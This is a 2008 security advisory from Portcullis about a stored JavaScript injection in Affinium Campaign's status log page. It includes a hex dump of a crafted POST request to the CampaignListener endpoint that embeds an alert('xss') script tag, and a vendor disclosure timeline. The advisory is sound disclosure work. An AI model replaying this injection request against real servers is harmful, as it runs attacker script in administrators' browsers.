Tried, Tested and Proven

Security Advisory 08-004 – Affinium Campaign’s status log web page is vulnerable to a second order JavaScript injection

Vulnerability Title:

The web application’s status log web page is vulnerable to a second order JavaScript injection.

Vulnerable System:

Affinium Campaign

Vulnerability discovery and development:

Portcullis Security Testing Services

Credit for Discovery:

Tim Brown – Portcullis Computer Security Ltd.

Affected Systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.

Details:

It is possible for an attacker to inject JavaScript into the web application which is typically deployed in front of the listener server by manipulating requests from the web application’s ActiveX control which encapsulates binary data within an HTTP POST request to https://webserver/Campaign/CampaignListener. The status log contains the requests made to the CampaignListener web page along with the results of any such requests. Since the CampaignListener web page is expecting binary data, no attempt to validate the input is made prior to passing it to the listener server. When an authenticated administrative user visits the status logs web page, the JavaScript from the manipulated ActiveX control request is returned in the response. For example:

00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 36 20 48 54 54 50 2f |ClientID=6 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 57 57 43 54 4c 6d 58 59 54 64 6d 50 6e 68 50 |HWWCTLmXYTdmPnhP|
00000070 41 76 4a 59 54 78 66 54 73 76 41 6e 41 78 68 79 |AvJYTxfTsvAnAxhy|
00000080 54 5a 50 7a 6b 34 6a 43 47 38 47 52 44 51 57 6b |TZPzk4jCG8GRDQWk|
00000090 42 36 6e 5a 21 37 30 37 36 33 30 32 33 39 0d 0a |B6nZ!707630239..|
000000a0 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 |Content-Length: |
000000b0 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 |291..Content-Typ|
000000c0 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 |e: multipart/for|
000000d0 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 00 |m-data..........|
000000e0 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 12 |................|
000000f0 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 00 |....unica_acsvr.|
00000100 12 73 00 00 00 3c 73 63 72 69 70 74 3e 61 6c 65 |.s...(less than)script(greater than)ale|
00000110 72 74 28 27 78 73 73 27 29 3c 2f 73 63 72 69 70 |rt('xss')(less than)/scrip|
00000120 74 3e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |t(greater than)AAAAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000170 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 95 |AAAAAAA..*....ò.|
00000180 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 d5 |GQWò..........)Õ|
00000190 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 4f |.O_urù.f=(less than)b.¸ÖæO|
000001a0 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 74 |c...........part|
000001b0 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 00 |ition1..........|
000001c0 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 05 |.1201007871298..|
000001d0 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 00 |................|
000001e0 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 2d |...............-|
000001f0 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 0d 0a |l......en_US...|
Impact:

An attacker would use this to execute malicious code on a visitors computers.

Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 – vendor informed

10/06/2008 – Vendor updated

11/06/2008 – Vendor responded via email

16/07/2008 – Vendor confirmed patches

Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.